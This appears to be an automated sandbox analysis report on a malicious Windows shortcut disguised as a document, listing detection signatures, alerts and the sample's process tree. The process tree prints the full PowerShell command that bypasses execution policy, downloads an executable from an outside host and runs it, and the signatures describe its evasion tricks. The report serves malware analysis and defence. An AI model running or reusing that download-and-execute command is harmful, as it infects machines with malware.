Windows
Analysis Report
Document.doc.lnk
Overview
General Information
Detection
MalLnk
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Snort IDS alert for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected malicious lnk
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Found URL in windows shortcut file (LNK)
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64
- cmd.exe (PID: 4432 cmdline: "C:\Windows\System32\cmd.exe" /c powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://twizt.net/spl.exe','C:\Users\user\windrv.exe');Start-Process 'C:\Users\user\windrv.exe' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 3364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5324 cmdline: powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://twizt.net/spl.exe','C:\Users\user\windrv.exe');Start-Process 'C:\Users\user\windrv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
- windrv.exe (PID: 1288 cmdline: "C:\Users\user\windrv.exe" MD5: 3CB61CE448A806E79CE88D06E992CC9D)
- winsvc.exe (PID: 5284 cmdline: C:\Users\user\winsvc.exe MD5: 3CB61CE448A806E79CE88D06E992CC9D)
- winsvc.exe (PID: 1292 cmdline: "C:\Users\user\winsvc.exe" MD5: 3CB61CE448A806E79CE88D06E992CC9D)
- winsvc.exe (PID: 5252 cmdline: "C:\Users\user\winsvc.exe" MD5: 3CB61CE448A806E79CE88D06E992CC9D)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_MalLnk | Yara detected malicious lnk | Joe Security |

System Summary

Source | Author
---|---
| Florian Roth (Nextron Systems)
| Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
| frack113, Nasreddine Bencherchali (Nextron Systems)
| Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
| Florian Roth (Nextron Systems)
| James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
| Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)

Data Obfuscation

Source | Author
---|---
| Joe Security
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
---|---|---|---|---|---
03/28/24-10:33:03.840918 | 2853272 | 80 | 49706 | TCP | A Network Trojan was detected
03/28/24-10:33:03.598146 | 2019714 | 49706 | 80 | TCP | Potentially Bad Traffic
AV Detection

Source | Scanner | Rows
---|---|---
| Avira | 1
| Avira URL Cloud | 23
| Virustotal (Perma Link) | 4
| ReversingLabs | 3
| Joe Sandbox ML | 3
| File opened | 1
Networking

Source | Detection
---|---
| Snort IDS
| Snort IDS
| HTTP traffic detected